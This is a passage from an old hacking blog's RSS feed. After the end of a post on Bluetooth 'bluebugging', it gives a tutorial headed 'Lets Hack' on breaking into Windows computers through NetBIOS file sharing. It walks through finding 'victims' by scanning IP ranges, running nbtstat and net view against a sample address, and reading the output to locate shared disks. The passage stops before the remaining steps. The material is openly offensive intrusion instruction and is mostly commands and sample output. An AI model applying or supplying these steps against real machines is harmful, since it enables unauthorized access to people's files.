Once the connection is established by pairing of device . It can do anything with the device.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Bluebugging cannot harm all the cell phones ,due to less range. But this can be avoided by switching OFF the Bluetooth to non discoverable mode.&lt;br /&gt;This article is to inform the people about &lt;strong&gt;consequences of bluebugging&lt;/strong&gt;. And also include how to protect from it.&lt;/p&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>TYPES OF ATTACKS</title><link>http://hackingwithme.blogspot.com/2009/03/types-of-attacks.html</link><category>Remote access</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Mon, 30 Mar 2009 11:52:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-34659672972648017</guid><description>&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt; line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;We can launch two types of attack on the remote computer having NetBIOS.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;1. Reading/Writing to a remote computer system&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;2. Denial of Service&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;   &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Searching for a victim&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt; &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.&lt;/span&gt;&lt;span style="font-size:10.0pt; line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;  &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Lets Hack -Part 1 Remotely reading/writing to a victiim's computer&lt;/span&gt;&lt;span style="font-size:10.0pt; line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;The command that you will use to view the NetBIOS name is&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;c:\windows&gt;nbtstat -a 203.195.136.156&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Let suppose that the output comes out to be&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;NetBIOS Remote Machine Name Table&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Name Type Status&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;user &lt;00&gt; UNIQUE Registered&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;workgroup &lt;00&gt; GROUP Registered&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;user &lt;03&gt; UNIQUE Registered&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;user &lt;20&gt; UNIQUE Registered&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt; &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;MAC Address = 00-02-44-14-23-E6&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;  &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;The number &lt;20&gt; shows that the victim has enabled the File And Printer Sharing.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt; &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;NOTE - If you do not get this number there are two possibilities&lt;/span&gt;&lt;span style="font-size:10.0pt; line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;1. You do not get the number &lt;20&gt; . This shows that the victim has not enabled the File And Printer Sharing .&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt; &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Now our next step would be to view the drive or folders the victim is sharing.&lt;/span&gt;&lt;span style="font-size: 10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;We will use command&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;c:\windows&gt;net view \\203.195.136.156&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Let suppose we get the following output&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Shared resources at \\203.195.136.156&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;ComputerNameGoesHere&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Share name Type Used as Comment&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;CDISK Disk&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt; &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;The command completed successfully.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;  &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;  &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New 